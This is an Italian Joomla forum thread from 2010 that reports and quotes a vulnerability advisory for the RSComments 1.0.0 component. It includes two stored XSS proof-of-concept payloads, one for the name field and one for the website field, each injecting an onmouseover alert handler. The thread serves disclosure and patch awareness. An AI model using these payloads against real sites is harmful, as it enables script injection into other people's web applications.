Joomla.it Forum

Non solo Joomla... => Sicurezza => : bugSearch.Net 21 Jun 2010, 09:19:04

: Joomla Component RSComments v1.0.0 XSS Vulnerability
: bugSearch.Net 21 Jun 2010, 09:19:04
Joomla Component RSComments v1.0.0 XSS Vulnerability (http://www.bugsearch.net/it/10149/joomla-component-rscomments-v100-xss-vulnerability.html)
: Re:Joomla Component RSComments v1.0.0 XSS Vulnerability
: vamba 21 Jun 2010, 14:46:08
Estensione commerciale
Controllare il sito di riferimento per aggiornamenti
L'ultima versione conosciuta risale al 7.6.2010 ed esattamente è la 1.0.0 Rev2

:
# Exploit Title: Joomla Component RSComments 1.0.0 Multiple XSS
Vulnerabilities
# Date: 18 May 2010
# Author: jdc
# Software Link: http://www.rsjoomla.com
# Version: 1.0.0
# Tested on: PHP5, MySQL5

Name Field Persistent XSS
-------------------------

x"/style="position:absolute;top:0;left:0;width:999pc;height:999pc"/onmouseover="alert(1)//"

NOTE: ONLY executes in backend!

Website Field Persistent XSS
----------------------------

http://x"/style="position:absolute;top:0;left:0;width:999pc;height:999pc"/onmouseover="alert(1)//"

NOTE: also executes in backend!